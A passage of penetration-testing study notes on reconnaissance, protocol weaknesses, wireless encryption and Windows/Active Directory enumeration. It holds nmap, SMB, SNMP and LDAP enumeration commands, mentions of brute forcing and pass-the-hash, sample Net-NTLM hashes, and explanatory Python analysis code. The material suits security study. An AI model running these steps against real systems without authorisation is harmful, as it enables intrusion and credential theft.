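    for r in records:
        if r.rtype == "HINFO":
            notes.append(f"HINFO leaks CPU/OS for {r.name}: {r.rdata}")
        elif r.rtype == "SRV":
            notes.append(f"SRV reveals a service location: {r.name} -> {r.rdata}")
    return notes


if __name__ == "__main__":
    recs = parse_axfr(SAMPLE_AXFR)
    print(count_by_type(recs))
    print("\n".join(findings(recs, "example.test")))
```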

C3: Customer Website Analysis

Analysis of information from a target website, both from displayed content and from within the HTML source.

whatweb -v -a 3 <target_IP>

View Page source
1. Check Network Tab
2. Check Cookies
3. Check page source for app name, versions, etc

Burp Suite for HTTP request interception, forwarding, and analysis.

C4: Google Hacking and web enumeration

Effective use of search engines and other public data sources to gain information about a target.

Google Dorks

https://www.exploit-db.com/google-hacking-database

Google search parameters:

inurl:
intitle:
site:

Keywords include the target app name, or words like "admin", "login", "camera" etc.

C5: Network News Transfer Protocol(NNTP) - Newsgroups and Mailing Lists

Searching newsgroups or mailing lists for useful information about a target.

https://datatracker.ietf.org/doc/html/rfc977

NNTP specifies a protocol for the distribution, inquiry, retrieval, and posting of news articles using a reliable stream-based transmission of news among the ARPA-Internet community. NNTP is designed so that news articles are stored in a central database allowing a subscriber to select only those items he wishes to read. Indexing, cross-referencing, and expiration of aged messages are also provided.

nmap --script=nntp-ntlm-info <target_ip>

Author's Note: Might see NNTP in CTFs, perhaps not common in real-life pentests.

C6: Information leakage from Email & News Headers

Analysing news group and e-mail headers to identify internal system information.

https://sendpulse.com/support/glossary/email-header

https://security.stackexchange.com/questions/182841/does-an-email-header-source-contain-sensitive-information

Some possible "sensitive" data leaks:
- Sender and recipient email addresses
- Server names, which could reveal the FQDN of your internal domain
- Your organisation's public IP address
- Information on servers that have handled the email
- TLS/SSL info and what ciphers you use (or don't use)
- Banner information
- Email gateway details: SMTP, POP, IMAP, etc.
- What anti-virus you use to scan email
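The leak categories listed above, checked over a constructed header block in Python as an added example (not code from either linked source): it walks the Received: chain and reports internal FQDNs, private addresses, server software and builds, hops relayed without TLS, and the AV and mail client banners. Treating .local/.internal/.lan/.corp as internal suffixes is an assumption.

```python
"""Pull internal-infrastructure details out of e-mail headers.

Added example for these notes, not code from any source linked above. The
header block is constructed; hosts, addresses and product names are fictional,
and the ".local/.internal/.lan/.corp" suffixes are an assumed naming convention.
"""
import email
import ipaddress
import re
from typing import Dict, List

# Constructed headers of a message that left an organisation via its mail gateway.
# Each hop prepends a Received: line, so the first one is the most recent hop.
SAMPLE_HEADERS = """\
Received: from mx-gw01.example-corp.test (mx-gw01.example-corp.test [203.0.113.25])
        by mail.recipient.test (Postfix) with ESMTPS id 4HqJ3b2k
        (version=TLS1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256)
        for <alice@recipient.test>; Fri, 03 Sep 2021 10:15:02 +0000
Received: from EXCH01.corp.example-corp.local (10.20.1.15) by
        mx-gw01.example-corp.test (10.20.1.5) with Microsoft SMTP Server id 15.1.2242.4;
        Fri, 3 Sep 2021 10:14:58 +0000
Received: from WS-FINANCE-07.corp.example-corp.local (192.168.50.77) by
        EXCH01.corp.example-corp.local (10.20.1.15) with Microsoft SMTP Server (TLS)
        id 15.1.2242.4; Fri, 3 Sep 2021 10:14:55 +0000
X-Virus-Scanned: ExampleAV Gateway 9.2
X-Mailer: Microsoft Outlook 16.0
From: bob@example-corp.test
To: alice@recipient.test
Subject: Q3 figures
"""

IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
FQDN = re.compile(r"\b([A-Za-z0-9][A-Za-z0-9-]*(?:\.[A-Za-z0-9-]+)+)\b")
SOFTWARE = re.compile(r"(Postfix|Exim|Sendmail|Microsoft SMTP Server)")
INTERNAL_SUFFIXES = (".local", ".internal", ".lan", ".corp")  # assumed convention
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_private(ip: str) -> bool:
    try:
        return any(ipaddress.ip_address(ip) in net for net in RFC1918)
    except ValueError:  # not a valid address (e.g. a dotted build number)
        return False


def analyse_hop(received: str) -> Dict:
    """Extract hosts, addresses, TLS and software details from one Received: header."""
    text = " ".join(received.split())  # unfold continuation lines
    tls = re.search(r"version=(TLS\S*)", text)
    cipher = re.search(r"cipher=(\S+)", text)
    soft = SOFTWARE.search(text)
    build = re.search(r"\bid (\d+(?:\.\d+)+)", text)  # dotted build number, not a queue id
    return {
        "internal_hosts": [h for h in FQDN.findall(text) if h.lower().endswith(INTERNAL_SUFFIXES)],
        "private_ips": [ip for ip in IPV4.findall(text) if is_private(ip)],
        "tls_version": tls.group(1) if tls else ("TLS" if "(TLS)" in text else None),
        "cipher": cipher.group(1) if cipher else None,
        "software": soft.group(1) if soft else None,
        "version": build.group(1) if build else None,
    }


def analyse_headers(raw: str) -> Dict:
    """Parse the header block with the stdlib email parser and analyse every hop."""
    msg = email.message_from_string(raw)
    return {
        "hops": [analyse_hop(h) for h in msg.get_all("Received", [])],
        "antivirus": msg.get("X-Virus-Scanned"),
        "mailer": msg.get("X-Mailer"),
    }


def findings(raw: str) -> List[str]:
    """What a recipient (or an attacker reading a bounced mail) learns about the sender's network."""
    report = analyse_headers(raw)
    notes = []
    for n, hop in enumerate(report["hops"], 1):
        notes += [f"hop {n}: internal FQDN exposed: {h}" for h in hop["internal_hosts"]]
        notes += [f"hop {n}: private address exposed: {ip}" for ip in hop["private_ips"]]
        if hop["software"]:
            ver = f" {hop['version']}" if hop["version"] else ""
            notes.append(f"hop {n}: mail server software: {hop['software']}{ver}")
        if hop["tls_version"] is None:
            notes.append(f"hop {n}: relayed without TLS")
    if report["antivirus"]:
        notes.append(f"mail AV product disclosed: {report['antivirus']}")
    if report["mailer"]:
        notes.append(f"client software disclosed: {report['mailer']}")
    return notes


if __name__ == "__main__":
    print("\n".join(findings(SAMPLE_HEADERS)))
```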

D: Networking Equipment

D1: Management Protocols

Weaknesses in the protocols commonly used for the remote management of devices:
- Telnet
- Web based protocols
- SSH
- SNMP (covering network information enumeration and common attacks against Cisco configurations)
- TFTP
- Cisco Reverse Telnet
- NTP

Telnet

Not encrypted, all in plaintext.

More details under Web Technologies.

Web based protocols

HyperText Transfer Protocol (HTTP)

Not encrypted, all in plaintext.

HTTPS

Secure; TLS 1.3 is the latest version. TLS 1.2 was deemed vulnerable and is approaching end-of-life (in 2021).

Secure Shell(SSH)

Generally secure, depending on the encryption configured.
If we have a username and password, we can log in to the system.
If we have the private key, we can log in without a username and password.

Simple Network Management Protocol(SNMP)

https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol
Used by Network Management Systems(NMS) to monitor network infrastructure.

SNMPv1 is unencrypted.

The latest version, SNMPv3, is encrypted.

Open-source NMS example:

https://prometheus.io/

SNMP might leak credentials and other data.

If there is write access, remote code execution is possible.

https://book.hacktricks.xyz/pentesting/pentesting-snmp

Trivial File Transfer Protocol(TFTP)

https://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol#Security_considerations

Simple to implement.

No authentication or access control mechanisms.

Cisco reverse Telnet

Reverse Telnet allows the Telnet server to write to a computer terminal or device.

Telnet - Network to network

Reverse Telnet - Network to serial

*serial is hardware communication.

https://en.wikipedia.org/wiki/Serial_communication

Take a server rack for example. It has servers, modems, routers and switches on it, possibly connected via serial through the router.

It can sometimes be seen as:

Attacker -> Router -> console on device

https://community.cisco.com/t5/switching/reverse-telnet/td-p/2159217

If we can access the router on the server rack, we might be able to access other devices on the network.

Network Time Protocol(NTP)

https://en.wikipedia.org/wiki/Network_Time_Protocol

Used to synchronize clocks between computer systems in a network.
UDP port 123

Might leak system information, hostnames of the network, etc.

nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 <target_ip>

D2: Network Traffic Analysis

Techniques for local network traffic analysis. Analysis of network traffic stored in PCAP files.

https://www.wireshark.org/docs/wsug_html_chunked/ChapterWork.html

We can see raw data at each different layer:

Frame -> Ethernet -> IPv4 -> TCP -> Http

We can see a hexdump of the data.

We can extract files from PCAP files.

For extracting HTTP files:
1. Open the .pcap file
2. File -> Export Objects -> HTTP...
3. Choose what you want to save.

For extracting FTP files:
1. Filter for FTP-DATA packets
2. Right-click -> Follow -> TCP Stream
3. Select RAW as the output type
4. Save the file

Some knowledge of reading hexdump might be needed, or experience to select which TCP streams to follow.

D3: Networking Protocols

Security issues relating to the networking protocols.

Protocol / Description / Security Issues

Address Resolution Protocol(ARP)
  Description: Used for discovering MAC addresses in a network.
  Security issues: No authentication. ARP spoofing - pretends to be another computer; used for man-in-the-middle attacks.

Dynamic Host Configuration Protocol(DHCP)
  Description: Automatically assigns IP addresses to new devices in the network. Commonly found in routers.
  Security issues: No authentication required; can be used to launch man-in-the-middle attacks, gain unauthorized access to resources, or cause DoS.

Cisco Discovery Protocol(CDP)
  Description: Proprietary protocol. Used to share information about other directly connected Cisco equipment, such as the operating system version and IP address.
  Security issues: Information leakage.

Hot Standby Router Protocol (HSRP)
  Description: Cisco proprietary protocol. Provides redundancy for routers through virtual MAC addresses etc.
  Security issues: DoS, take over the active router. https://andrewroderos.com/attacking-hsrp/

Virtual Router Redundancy Protocol(VRRP)
  Description: Similar to HSRP, but incompatible with it.
  Security issues: Similar to HSRP.

VLAN Trunking Protocol(VTP)
  Description: Cisco proprietary protocol. Sends VLAN information to the whole local area network.
  Security issues: VTP bomb. The network uses the configuration with the highest configuration revision number. If a new switch with the correct VTP domain name and password but a higher revision number is added to the network, the whole network adopts the VTP information from the new switch, overwriting the current configuration.

Spanning Tree Protocol(STP)
  Description: STP helps a network's traffic flow with less congestion, saving resources.
  Security issues: -

Terminal Access Controller Access-Control System plus (TACACS+)
  Description: Provides Authentication, Authorization and Accounting(AAA) services to the network.
  Security issues: -

D4: IPSec 500/UDP

Enumeration and fingerprinting of devices running IPSec services.

nmap -sU -p 500 <target_IP>

ike-scan -M <target_IP>

D5: Voice over IP(VoIP)

5060 UDP/TCP unencrypted

5061 UDP/TCP TLS encrypted

Enumeration and fingerprinting of devices running VoIP services.

Knowledge of the SIP protocol.

https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4

https://github.com/fozavci/viproy-voipkit

Similar to HTTP: a request-response model with user agents and URIs.

The following request types are common within SIP:

INVITE — Invites an account to join the call.

ACK — Confirmation regarding the invite of joining the call.

CANCEL — Canceling a queued call.

REGISTER — Registering the user against the SIP server.

OPTIONS — Shows the options the caller has.

BYE — Ends the call between both sides.

REFER — Shows that the receiver needs to communicate through a 3rd party by the information attached to the request.

SIP Response Classes:

1xx (Informational)

2xx (Success)

3xx (Redirection)

4xx (Failed requests)

5xx (Web server cannot complete request)

6xx (Global errors)

Typical SIP Interaction Structure:

1. Sender initiates an INVITE request.

2. Receiver sends back a 100 (Trying) response.

3. Sender starts ringing by sending a 180 (Ringing) response.

4. Receiver picks up the phone and a 200 success response is sent (OK).

5. ACK is sent by the initiator.

6. Call started using RTP.

7. BYE request sent to end the call.

Source: Vartai Security, 10 Mar 2020, Practical VoIP Penetration Testing
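The request types, response classes and interaction above, walked through in Python as an added example (not code from the Vartai article or viproy): a small SIP parser, the dialog replayed as call states, and the User-Agent/Server banners it exposes for fingerprinting. The PBX, accounts, addresses and banner strings are constructed.

```python
"""Parse SIP messages and follow the INVITE dialog described above.

Added example for these notes; it is not code from the Vartai article or the
viproy toolkit. The messages are constructed for a fictional PBX (pbx.example.test).
"""
from typing import Dict, List, Set

STATUS_CLASSES = {1: "Informational", 2: "Success", 3: "Redirection",
                  4: "Failed requests", 5: "Server cannot complete request", 6: "Global errors"}
CALL_ID = "a84b4c76e66710@192.0.2.10"  # constructed


def _msg(start_line: str, cseq: str, agent_header: str) -> str:
    """Build one SIP message with the headers shared by every message in the dialog."""
    return "\r\n".join([
        start_line,
        "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776asdhds",
        'From: "Alice" <sip:alice@pbx.example.test>;tag=1928301774',
        "To: <sip:bob@pbx.example.test>",
        f"Call-ID: {CALL_ID}",
        f"CSeq: {cseq}",
        agent_header,
        "Content-Length: 0", "", ""])


PHONE, PBX = "User-Agent: ExamplePhone/2.1.0", "Server: ExamplePBX/4.0"  # constructed banners
DIALOG = [  # the typical interaction: INVITE, 100, 180, 200, ACK, (RTP), BYE, 200
    _msg("INVITE sip:bob@pbx.example.test SIP/2.0", "314159 INVITE", PHONE),
    _msg("SIP/2.0 100 Trying", "314159 INVITE", PBX),
    _msg("SIP/2.0 180 Ringing", "314159 INVITE", PBX),
    _msg("SIP/2.0 200 OK", "314159 INVITE", PBX),
    _msg("ACK sip:bob@pbx.example.test SIP/2.0", "314159 ACK", PHONE),
    _msg("BYE sip:bob@pbx.example.test SIP/2.0", "314160 BYE", PHONE),
    _msg("SIP/2.0 200 OK", "314160 BYE", PBX),
]


def parse_sip(raw: str) -> Dict:
    """Split a SIP message into its start line and headers (any body is ignored)."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    start, headers = head[0], {}
    for line in head[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    cseq = headers.get("cseq", "").split()
    msg = {"headers": headers, "call_id": headers.get("call-id"),
           "cseq_method": cseq[-1] if cseq else None}
    if start.startswith("SIP/2.0 "):  # response: SIP/2.0 <code> <reason>
        _, code, reason = start.split(" ", 2)
        msg.update(kind="response", status=int(code), reason=reason,
                   status_class=STATUS_CLASSES[int(code) // 100])
    else:  # request: <METHOD> <Request-URI> SIP/2.0
        method, uri, _ = start.split(" ", 2)
        msg.update(kind="request", method=method, uri=uri)
    return msg


def dialog_states(messages: List[str]) -> List[str]:
    """Replay the exchange and return the call states it passes through."""
    states: List[str] = []
    call_id = None
    for raw in messages:
        m = parse_sip(raw)
        call_id = call_id or m["call_id"]
        if m["call_id"] != call_id:
            raise ValueError(f"message from another dialog: {m['call_id']}")
        if m["kind"] == "request":
            states.append({"INVITE": "calling", "ACK": "confirmed (media over RTP)",
                           "BYE": "terminating"}.get(m["method"], m["method"].lower()))
        elif m["status"] == 100:
            states.append("proceeding")
        elif m["status"] == 180:
            states.append("ringing")
        elif m["status_class"] == "Success":
            # 200 OK answers the INVITE; a later 200 OK acknowledges the BYE
            states.append("answered" if m["cseq_method"] == "INVITE" else "terminated")
        else:
            states.append(f"{m['status']} {m['reason']} ({m['status_class']})")
    return states


def fingerprint(messages: List[str]) -> Set[str]:
    """User-Agent / Server banners: the fingerprinting data SIP hands out in clear on 5060."""
    banners = set()
    for raw in messages:
        h = parse_sip(raw)["headers"]
        banners.update(v for v in (h.get("user-agent"), h.get("server")) if v)
    return banners


if __name__ == "__main__":
    print(" -> ".join(dialog_states(DIALOG)))
    print(sorted(fingerprint(DIALOG)))
```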

D6: Wireless

Enumeration and fingerprinting of devices running Wireless (802.11) services.
Knowledge of various options for encryption and authentication, and the relative methods of each.
- WEP
- TKIP
- WPA/WPA2
- EAP/LEAP/PEAP

https://www.aircrack-ng.org/doku.php?id=simple_wep_crack

Wired Equivalent Privacy(WEP)

Deprecated and easily cracked; the password can be extracted once initialization vectors (IVs) are captured.

Standard 64-bit WEP uses a 40 bit key (also known as WEP-40), which is concatenated with a 24-bit initialization vector (IV) to form the RC4 key.
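As an added example (not aircrack-ng's code), the keying just described modelled in Python: RC4 keyed with IV || 40-bit key, showing that a repeated IV gives the same keystream and so leaks the XOR of two plaintexts, plus the birthday bound on how soon a 24-bit IV repeats. The key, IVs and frame payloads are constructed; the CRC-32 ICV and 802.11 frame layout are left out.

```python
"""Why WEP's 24-bit IV and per-frame RC4 keying are fatal.

Added example for these notes (not aircrack-ng code). It models only the keying
described above (IV || 40-bit key -> RC4), leaving out the CRC-32 ICV and the
802.11 frame format; key, IVs and payloads are constructed.
"""
import math


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling (KSA) followed by the output loop (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % 256])
    return bytes(out)


def rc4(key: bytes, data: bytes) -> bytes:
    return xor(data, rc4_keystream(key, len(data)))


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep40_frame_key(iv: bytes, key: bytes) -> bytes:
    """WEP-40: the 24-bit per-frame IV is simply prepended to the 40-bit shared key."""
    if len(iv) != 3 or len(key) != 5:
        raise ValueError("WEP-40 needs a 3-byte IV and a 5-byte key")
    return iv + key


def wep40_encrypt(iv: bytes, key: bytes, payload: bytes) -> bytes:
    """What goes over the air: the IV in clear, then RC4(IV || key) applied to the payload."""
    return iv + rc4(wep40_frame_key(iv, key), payload)


def iv_reuse_leaks_plaintext_xor(key: bytes, iv: bytes, p1: bytes, p2: bytes) -> bool:
    """Two frames under one IV share a keystream, so c1 XOR c2 == p1 XOR p2.
    The IV is public, so an eavesdropper knows exactly which frames to pair."""
    c1 = wep40_encrypt(iv, key, p1)[3:]
    c2 = wep40_encrypt(iv, key, p2)[3:]
    n = min(len(p1), len(p2))
    return xor(c1, c2)[:n] == xor(p1, p2)[:n]


def frames_until_iv_collision(probability: float = 0.5) -> int:
    """Birthday bound: frames captured before some IV repeats with the given probability.
    With only 2^24 IVs this is a few thousand frames, i.e. seconds on a busy network."""
    space = 2 ** 24
    return math.ceil(math.sqrt(2 * space * math.log(1 / (1 - probability))))


if __name__ == "__main__":
    shared_key = bytes.fromhex("0102030405")  # constructed 40-bit key
    print("IV reuse leaks p1^p2:", iv_reuse_leaks_plaintext_xor(
        shared_key, b"\x00\x00\x01", b"GET /index.html", b"PUT /upload.cgi"))
    print("frames for a 50% IV collision:", frames_until_iv_collision())
```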

Temporal Key Integrity Protocol(TKIP)

Interim replacement for WEP. Early versions considered deprecated and not recommended for use.

Was rebranded as WPA.

TKIP implements a key mixing function that combines the secret root key with the initialization vector before passing it to the RC4 cipher initialization.

Wi-Fi Protected Access WPA/WPA2

https://en.wikipedia.org/wiki/Wi-Fi_Protected_Access

If the Wi-Fi password is weak, it is easy to crack.

https://www.aircrack-ng.org/doku.php?id=cracking_wpa

WPA was released in 2003 as an interim measure to replace WEP.

WPA2 was released in 2004 as a more secure version.

WPA3 was released in 2018 after security issues were raised.

Keys are pre-shared.

Extensible Authentication Protocol(EAP/LEAP/PEAP)

Extensible Authentication Protocol (EAP) is an authentication framework that is used in local area networks (LANs) and dial-up connections.

EAP is used primarily in wireless communication for authentication among clients and a wireless LAN. As a point-to-point (P2P) LAN data communication framework, EAP provides a range of authentication mechanisms, for example supporting one-time passwords (OTPs), smart cards, public-key encryption authentication, and digital certificates.

EAP’s major focus is on wireless network communication such as access points used to authenticate client-wireless/LAN network systems. A straightforward EAP flow would occur as follows: Using a transceiver, the client requests a wireless connection. The transceiver then gets client data and conveys it to the authentication where it is processed. The authenticator then requests client ID from the transceiver and once it is received the latter conveys a message to the client requesting the client ID. Once verified, the client ID is sent to the server.

Source: https://www.hypr.com/extensible-authentication-protocol-eap/

LEAP - Lightweight Extensible Authentication Protocol

PEAP - Protected Extensible Authentication Protocol

https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol

https://en.wikipedia.org/wiki/Protected_Extensible_Authentication_Protocol

Authentication framework used by WPA, WPA2 and WPA3.

https://documentation.meraki.com/MR/WiFi_Basics_and_Best_Practices/WPA3_Encryption_and_Configuration_Guide

LEAP built by Cisco. LEAP not recommended for use by Cisco.

PEAP is similar to EAP-TLS, which is EAP run over TLS for security. Recommended for use.

PEAP was jointly developed by Cisco Systems, Microsoft, and RSA Security.

D7: Configuration Analysis

Analysing configuration files from the following types of Cisco equipment:
- Routers
- Switches
Interpreting the configuration of other manufacturers’ devices.

https://www.blackhillsinfosec.com/how-to-use-ccat-an-analysis-tool-for-cisco-configuration-files/

https://github.com/frostbits-security/ccat

E: Microsoft Windows Security Assessment

E1: Domain Reconnaissance

Identifying domains/workgroups and domain membership within the target network.

Identifying key servers within the target domains.

Identifying and analysing internal browse lists.

Identifying and analysing accessible SMB shares

Identifying domains/workgroups and domain membership within the target network.

From outside a Windows computer:

nslookup
nmap
name -dhcp
dig

Once we have access to a Windows CMD or PowerShell:
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation

# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges

# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Identifying key servers within the target domains.

From nmap scans, we should see the names of the domain controllers, if any.

net view

Identifying and analysing internal browse lists.

The Browse List is the list of available shared network resources collected and distributed by the Computer Browser service on a Microsoft network.
Source: Network Encyclopedia

https://en.wikipedia.org/wiki/Browser_service

net share
net view
net view \\<computer name> /All

https://www.tenforums.com/tutorials/112017-view-all-network-shares-windows-pc.html

Identifying and analysing accessible SMB shares.

net share
enum4linux <target_ip>
smbclient -L \\\\<target_ip>

*smbclient's -L option lists shares. Remove the -L option to connect.

Try an anonymous login first; if that fails, use other credentials.

E2: User Enumeration

Identifying user accounts on target systems and domains using NetBIOS, SNMP and LDAP.

Remote Procedure Call (RPCINFO)

Check out RPCINFO and its options.

Synopsis

rpcinfo [-m | -s] [host]

  • rpcinfo -p [host]
  • rpcinfo -T transport host prognum [versnum]
  • rpcinfo -l [-T transport] host prognum [versnum]
  • rpcinfo [-n portnum] -u host prognum [versnum]
  • rpcinfo [-n portnum] [-t] host prognum [versnum]
  • rpcinfo -a serv_address -T transport prognum [versnum]
  • rpcinfo -b [-T transport] prognum versnum
  • rpcinfo -d [-T transport] prognum versnum

https://linux.die.net/man/8/rpcinfo

https://www.ibm.com/docs/en/aix/7.2?topic=r-rpcinfo-command

NetBIOS

nbtscan <target_ip>
nmap -sV 172.16.1.102 --script nbstat.nse -v

SNMP

https://www.netadmintools.com/snmp-mib-and-oids

snmpwalk -c public -v1 <target_ip>
nmap --script "snmp* and not snmp-brute" <target_ip>

OIDs will be returned, some of which reveal running processes.

LDAP

nmap -n -sV --script "ldap* and not brute" <target_ip>
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"

We can change the DC data with other information that we have found. We can then find information for computers, users, administrators, etc.

E3: Active Directory

Active Directory Roles (Global Catalogue, Master Browser, FSMO)
Reliance of AD on DNS and LDAP
Group Policy (Local Security Policy)

AD roles

Global Catalogue

Handles AD queries and logon

Domain Master Browser

https://en.wikipedia.org/wiki/Domain_Master_Browser

Used when there is more than one network in the Windows domain.
Each subnet/domain portion has a Master Browser, and the Master Browsers share their information with each other.

Once the browse list is collected and compiled, it is transmitted back to all the Master Browsers as the enterprise-wide browse list for the domain.

Flexible Single Master Operations(FSMO)

Flexible Single Master Operations (FSMO, F is sometimes "floating"; pronounced Fiz-mo), or just single master operation or operations master, is a feature of Microsoft's Active Directory (AD). As of 2005, the term FSMO has been deprecated in favour of operations masters.

FSMO is a specialized domain controller (DC) set of tasks, used where standard data transfer and update methods are inadequate. AD normally relies on multiple peer DCs, each with a copy of the AD database, being synchronized by multi-master replication. The tasks which are not suited to multi-master replication and are viable only with a single-master database are the FSMOs.

Source: https://en.wikipedia.org/wiki/Flexible_single_master_operation

The 5 FSMO roles are:

Schema Master – one per forest
Domain Naming Master – one per forest
Relative ID (RID) Master – one per domain
Primary Domain Controller (PDC) Emulator – one per domain
Infrastructure Master – one per domain

FSMO Roles: What do They do?
Schema Master: The Schema Master role manages the read-write copy of your Active Directory schema. The AD Schema defines all the attributes – things like employee ID, phone number, email address, and login name – that you can apply to an object in your AD database.

Domain Naming Master: The Domain Naming Master makes sure that you don’t create a second domain in the same forest with the same name as another. It is the master of your domain names. Creating new domains isn’t something that happens often, so of all the roles, this one is most likely to live on the same DC with another role.

RID Master: The Relative ID Master assigns blocks of Security Identifiers (SID) to different DCs they can use for newly created objects. Each object in AD has an SID, and the last few digits of the SID are the Relative portion. In order to keep multiple objects from having the same SID, the RID Master grants each DC the privilege of assigning certain SIDs.

PDC Emulator: The DC with the Primary Domain Controller Emulator role is the authoritative DC in the domain. The PDC Emulator responds to authentication requests, changes passwords, and manages Group Policy Objects. And the PDC Emulator tells everyone else what time it is! It’s good to be the PDC.

Infrastructure Master: The Infrastructure Master role translates Globally Unique Identifiers (GUID), SIDs, and Distinguished Names (DN) between domains. If you have multiple domains in your forest, the Infrastructure Master is the Babelfish that lives between them. If the Infrastructure Master doesn’t do its job correctly you will see SIDs in place of resolved names in your Access Control Lists (ACL).

Source: Jeff Petters, varonis.com, referenced on 03-Sep-2021
https://www.varonis.com/blog/fsmo-roles/

FSMO roles are still used as of Windows Server 2012 R2.

https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/fsmo-roles

Reliance of AD on DNS and LDAP

https://social.technet.microsoft.com/Forums/en-US/ac527731-0f0c-494d-bc49-bbb87e7151fe/active-directory-where-and-when-dns-and-ldap-is-used?forum=winservergen

DNS is used to resolve the names of local servers and applications,
e.g. a host name such as "secrets.local" can be translated into an IP address by the DNS server.

DNS is an integral part of the Active Directory.

LDAP acts like a database with read and write capabilities, which allows for communication within the AD. It also governs the authentication and authorization capabilities by storing user credentials etc.

Group Policy (Local Security Policy)

Group Policy defines how the OS operates, e.g. password expiry dates and administrative rights. It also manages users' access to files, folders, media, programs, etc.
https://www.cbtnuggets.com/blog/certifications/microsoft/7-most-useful-ad-group-policy-settings

https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/

# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges

# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource

E4: Windows Passwords

Password policies (complexity, lockout policies)

Account Brute Forcing

Hash Storage (merits of LANMAN, NTLMv1 / v2)

Offline Password Analysis (rainbow tables / hash brute forcing)

Password Policies

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/password-policy

Policy / Description

Enforce password history: Describes the best practices, location, values, policy management, and security considerations for the Enforce password history security policy setting.
Maximum password age: Describes the best practices, location, values, policy management, and security considerations for the Maximum password age security policy setting.
Minimum password age: Describes the best practices, location, values, policy management, and security considerations for the Minimum password age security policy setting.
Minimum password length: Describes the best practices, location, values, policy management, and security considerations for the Minimum password length security policy setting.
Password must meet complexity requirements: Describes the best practices, location, values, and security considerations for the Password must meet complexity requirements security policy setting.
Store passwords using reversible encryption: Describes the best practices, location, values, and security considerations for the Store passwords using reversible encryption security policy setting.

Account Bruteforcing

We can brute force accounts over RDP, SSH, LDAP, SMB or other exposed services.
We can try reusing credentials that we have found in apps, databases, etc.

Hash Storage (merits of LANMAN, NTLMv1 / v2)

Credentials are often saved as hashed data.

LANMAN

https://en.wikipedia.org/wiki/LAN_Manager

LAN Manager is an obsolete authentication protocol, with its final release in 1994.

Password weakness:
Limited to 14 characters, all upper case.

New Technology LAN Manager(NTLM)

https://en.wikipedia.org/wiki/NT_LAN_Manager

Microsoft has not recommended NTLM since 2010, but it is still widely used and deployed, especially in AD environments.

A famous attack is pass-the-hash: once we have obtained the NTLM hash, we can use it to access places that require authentication. Used over SMB and for lateral movement.

https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4

Sample NTLM hash

u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c

admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030

Source: Peter Gombos, 20 Feb 2018, "LM, NTLM, Net-NTLMv2, oh my!"

Different fields in the LM hash format

First field: the username

Second field: the SID (Security IDentifier) for that username

Third field: the LM hash

Fourth field: the NTLM hash

https://vk9-sec.com/windows-password-hashes/
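An added example (not from the Gombos or vk9-sec articles) that tells the formats in these notes apart by their field layout: the dump format described just above (user:RID:LM:NT) and the two Net-NTLM samples quoted earlier, which are the page's own. The SAM-dump line and its hashes are constructed placeholders; the empty-LM/empty-NT constants and hashcat mode numbers are well-known values.

```python
"""Identify the Windows credential formats that appear in these notes.

Added example (not code from the Gombos or vk9-sec articles). The two Net-NTLM
lines are the samples quoted above; the SAM-dump line is constructed and its
hashes are placeholders.
"""
import re
from typing import Dict, List

HEX = re.compile(r"^[0-9a-f]+$", re.IGNORECASE)

# Well-known constants: the LM field stored when LM hashing is disabled (or the
# password is empty), and the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# hashcat -m numbers per format (john: --format=lm / nt / netntlm / netntlmv2).
MODES = {"LM": 3000, "NTLM": 1000, "NetNTLMv1": 5500, "NetNTLMv2": 5600}

# Samples from the notes above (Gombos) and one constructed pwdump/samdump2 line.
NETNTLMV1_SAMPLE = "u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c"
NETNTLMV2_SAMPLE = "admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030"
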